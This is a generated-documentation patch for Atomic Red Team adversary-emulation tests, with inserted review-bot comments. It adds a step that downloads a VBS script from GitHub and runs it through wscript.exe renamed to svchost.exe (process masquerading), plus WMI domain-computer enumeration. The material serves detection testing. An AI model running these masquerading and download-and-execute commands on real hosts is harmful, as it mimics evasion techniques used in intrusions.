From c98b35d245911bbe792d69148e8b3f672aa68994 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Thu, 12 Oct 2023 14:25:00 +0000 Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/index.yaml | 23 ++++++++++++++++++----- atomics/Indexes/windows-index.yaml | 23 ++++++++++++++++++----- atomics/T1018/T1018.md | 3 ++- atomics/T1036.003/T1036.003.md | 18 ++++++++++++++++-- 4 files changed, 54 insertions(+), 13 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 540f9fb839..908f42941c 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -22991,10 +22991,22 @@ defense-evasion: Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder supported_platforms: - windows + dependency_executor_name: powershell + dependencies: + - description: 'Wscript file to execute must exist on disk + + ' + prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") + {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs" executor: command: | copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y - cmd.exe /c %APPDATA%\svchost.exe /B + cmd.exe /c %APPDATA%\svchost.exe "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs" cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1 ' 
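Review bot: The new get_prereq_command downloads T1036.003_masquerading.vbs from the GitHub raw URL and the executor then runs that file through the renamed wscript.exe, with no integrity check between the download and the execution, so whatever content the download returns is what runs on the host. A pinned digest checked before execution would close that gap, e.g. `if ((Get-FileHash "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs" -Algorithm SHA256).Hash -ne '<EXPECTED_SHA256>') { exit 1 }` (placeholder digest to be filled in from the published file). The same dependency block appears in the windows-index.yaml hunk and in the T1036.003.md dependencies section; since the subject line says these files are generated, the change presumably belongs in the source atomic definition they are built from rather than in this output.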
@@ -23046,7 +23058,8 @@ defense-evasion: executor: command: | copy "#{inputfile}" #{outputfile} - $myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id + try { $myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id } + catch { $_; exit $_.Exception.HResult} Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore @@ -103492,9 +103505,9 @@ discovery: executor: name: powershell elevation_required: false - command: 'get-wmiobject -class ds_computer -namespace root\directory\ldap - - ' + command: | + try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop } + catch { $_; exit $_.Exception.HResult } - name: Remote System Discovery - net group Domain Controller auto_generated_guid: 5843529a-5056-4bc1-9c13-a311e2af4ca0 description: | diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index c50c37051b..93953652e8 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml 
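Review bot: The added catch blocks end with `exit $_.Exception.HResult`, so the test's exit status is whatever HResult the thrown exception happens to carry; for many .NET exception types that is a generic value that does not distinguish failure causes, and if an exception ever carried HResult 0 the failure would be reported as success. Writing the record and then a fixed non-zero status, `catch { $_; exit 1 }`, gives a deterministic failure signal to whatever consumes the index. The same pattern appears in the get-wmiobject hunk on this line, in both windows-index.yaml hunks, and in the T1018.md and T1036.003.md hunks; as these files are generated per the subject line, the change presumably belongs in the source atomic definitions.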
@@ -19788,10 +19788,22 @@ defense-evasion: Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder supported_platforms: - windows + dependency_executor_name: powershell + dependencies: + - description: 'Wscript file to execute must exist on disk + + ' + prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") + {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs" executor: command: | copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y - cmd.exe /c %APPDATA%\svchost.exe /B + cmd.exe /c %APPDATA%\svchost.exe "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs" cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1 ' @@ -19843,7 +19855,8 @@ defense-evasion: executor: command: | copy "#{inputfile}" #{outputfile} - $myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id + try { $myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id } + catch { $_; exit $_.Exception.HResult} Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore 
@@ -88397,9 +88410,9 @@ discovery: executor: name: powershell elevation_required: false - command: 'get-wmiobject -class ds_computer -namespace root\directory\ldap - - ' + command: | + try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop } + catch { $_; exit $_.Exception.HResult } - name: Remote System Discovery - net group Domain Controller auto_generated_guid: 5843529a-5056-4bc1-9c13-a311e2af4ca0 description: | diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index ac15077252..35a0863d67 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -757,7 +757,8 @@ Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershe ```powershell -get-wmiobject -class ds_computer -namespace root\directory\ldap +try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop } +catch { $_; exit $_.Exception.HResult } ``` diff --git a/atomics/T1036.003/T1036.003.md b/atomics/T1036.003/T1036.003.md index 1d62354569..f6490fa67d 100644 --- a/atomics/T1036.003/T1036.003.md +++ b/atomics/T1036.003/T1036.003.md @@ -150,7 +150,7 @@ Upon execution, no windows will remain open but wscript will have been renamed t ```cmd copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y -cmd.exe /c %APPDATA%\svchost.exe /B +cmd.exe /c %APPDATA%\svchost.exe "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs" ``` #### Cleanup Commands: 
@@ -160,6 +160,19 @@ del /Q /F %APPDATA%\svchost.exe >nul 2>&1 +#### Dependencies: Run with `powershell`! +##### Description: Wscript file to execute must exist on disk +##### Check Prereq Commands: +```powershell +if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs") -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs" +``` + +
@@ -226,7 +239,8 @@ Upon successful execution, powershell will execute T1036.003.exe as svchost.exe ```powershell copy "#{inputfile}" #{outputfile} -$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id +try { $myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id } +catch { $_; exit $_.Exception.HResult} Stop-Process -ID $myT1036_003 ```